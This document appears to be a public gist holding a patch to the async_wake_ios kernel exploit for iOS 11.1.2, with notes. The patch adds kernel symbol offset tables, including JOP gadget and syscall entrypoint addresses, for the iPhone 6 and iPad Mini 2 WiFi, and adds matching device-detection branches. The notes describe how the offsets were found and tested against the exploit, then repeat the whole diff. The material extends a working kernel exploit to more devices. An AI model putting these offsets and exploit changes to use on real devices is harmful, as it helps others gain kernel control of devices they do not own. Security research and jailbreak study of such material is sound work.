staaldraad/async_ios_11_1_2.patch

## async_ios_11_1_2.patch
--- async_wake_ios 2/async_wake_ios/symbols.c	2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c	2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
   0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG         // look for xrefs to "Unsupported Class %u event code."
 };

+uint64_t ksymbols_iphone_6_15b202[] = {
+  0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+  0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+  0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
+  0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
+  0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
+  0xFFFFFFF0070C8740, // KSYMBOL_KFREE
+  0xFFFFFFF0070C873C, // KYSMBOL_RET
+  0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
+  0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
+  0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
+  0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES         // 0x6000 in to the data segment
+  0xFFFFFFF00709818c, // KSYMBOL_VALID_LINK_REGISTER      // look for reference to  FAR_EL1 (Fault Address Register (EL1))
+  0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET           // look for references to FPCR (Floating-point Control Register)
+  0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN         // look for references to Set PSTATE.DAIF [--IF]
+  0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN  // a bit before exception_return
+  0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET     // look for references to MDSCR_EL1
+  0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
+  0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP  // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
+  0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG         // look for xrefs to "Unsupported Class %u event code."
+};
+
+uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
+     0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
+     0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+     0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
+     0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
+     0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
+     0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
+     0xFFFFFFF0070B85BC, // KYSMBOL_RET
+     0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
+     0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
+     0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
+     0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES         // 0x6000 in to the data segment
+     0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER      // look for reference to  FAR_EL1 (Fault Address Register (EL1))
+     0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET           // look for references to FPCR (Floating-point Control Register)
+     0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN         // look for references to Set PSTATE.DAIF [--IF]
+     0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN  // a bit before exception_return
+     0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET     // look for references to MDSCR_EL1
+     0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
+     0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP  // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
+     0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG         // look for xrefs to "Unsupported Class %u event code."
+};
+
 uint64_t ksym(enum ksymbol sym) {
   if (kernel_base == 0) {
     if (!have_kmem_read()) {
@@ -194,6 +238,14 @@
     printf("this is iPhone 6s, should work!\n");
     symbols = ksymbols_iphone_6s_15b202;
     have_syms = 1;
+  } else if (strstr(u.machine, "iPhone7,2")) {
+    printf("this is iPhone 6, should work!\n!\n");
+    symbols = ksymbols_iphone_6_15b202;
+    have_syms = 1;
+  } else if (strstr(u.machine, "iPad4,4")) {
+    printf("this is iPad Mini 2 WiFi, should work!\n");
+    symbols = ksymbols_ipad_mini_2_wifi_15b202;
+    have_syms = 1;
   } else {
     printf("no symbols for this device yet\n");
     printf("tfp0 should still work, but the kernel debugger PoC won't\n");

## notes.md

      
    Raw
  

              notes.md
            
          
    Original Sploit: https://bugs.chromium.org/p/project-zero/issues/detail?id=1417#c3
CJI patch: https://gist.github.com/cji/32498b19ca0bf0536f5f40cc9b0881cc.
Used @cji's great blog-post to extract these: https://medium.com/@cji_/hunting-for-ios-kernel-symbols-e48a446bb00
Turns out that the iPhone6 and iPod6g symbols are the same... I thought 16 of the 18 were identical. Tried running the exploit against the iphone6 using the ipod6g symbols and managed to hit the 1/10 times this sploit fails. So I stuck to my working symbols. My symbols got you tfp0 but the debugger wasn't working. I recalculated and found that actually 18/18 symbol locations are identical between the two devices.
So you can actually just change the detection string for iPhone6 to this:
 printf("this is iPhone 6s, should work!\n");
     symbols = ksymbols_ipod_touch_6g_15b202;
     have_syms = 1;
	--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
	+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
	@@ -131,6 +131,50 @@
	0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
	};

	+uint64_t ksymbols_iphone_6_15b202[] = {
	+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
	+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
	+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
	+ 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
	+ 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
	+ 0xFFFFFFF0070C8740, // KSYMBOL_KFREE
	+ 0xFFFFFFF0070C873C, // KYSMBOL_RET
	+ 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
	+ 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
	+ 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
	+ 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
	+ 0xFFFFFFF00709818c, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
	+ 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
	+ 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
	+ 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
	+ 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
	+ 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
	+ 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
	+ 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
	+};
	+
	+uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
	+ 0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
	+ 0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
	+ 0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
	+ 0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
	+ 0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
	+ 0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
	+ 0xFFFFFFF0070B85BC, // KYSMBOL_RET
	+ 0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
	+ 0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
	+ 0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
	+ 0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
	+ 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
	+ 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
	+ 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
	+ 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
	+ 0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
	+ 0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
	+ 0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
	+ 0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
	+};
	+
	uint64_t ksym(enum ksymbol sym) {
	if (kernel_base == 0) {
	if (!have_kmem_read()) {
	@@ -194,6 +238,14 @@
	printf("this is iPhone 6s, should work!\n");
	symbols = ksymbols_iphone_6s_15b202;
	have_syms = 1;
	+ } else if (strstr(u.machine, "iPhone7,2")) {
	+ printf("this is iPhone 6, should work!\n!\n");
	+ symbols = ksymbols_iphone_6_15b202;
	+ have_syms = 1;
	+ } else if (strstr(u.machine, "iPad4,4")) {
	+ printf("this is iPad Mini 2 WiFi, should work!\n");
	+ symbols = ksymbols_ipad_mini_2_wifi_15b202;
	+ have_syms = 1;
	} else {
	printf("no symbols for this device yet\n");
	printf("tfp0 should still work, but the kernel debugger PoC won't\n");